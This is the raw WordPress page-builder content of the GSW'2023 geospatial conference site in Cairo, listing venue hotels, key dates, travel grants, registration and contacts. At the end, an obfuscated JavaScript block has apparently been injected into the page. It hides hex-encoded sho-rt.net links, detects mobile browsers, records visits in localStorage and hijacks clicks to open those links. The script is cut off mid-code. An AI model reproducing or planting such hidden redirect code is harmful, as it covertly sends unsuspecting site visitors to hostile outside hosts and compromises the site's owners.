alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 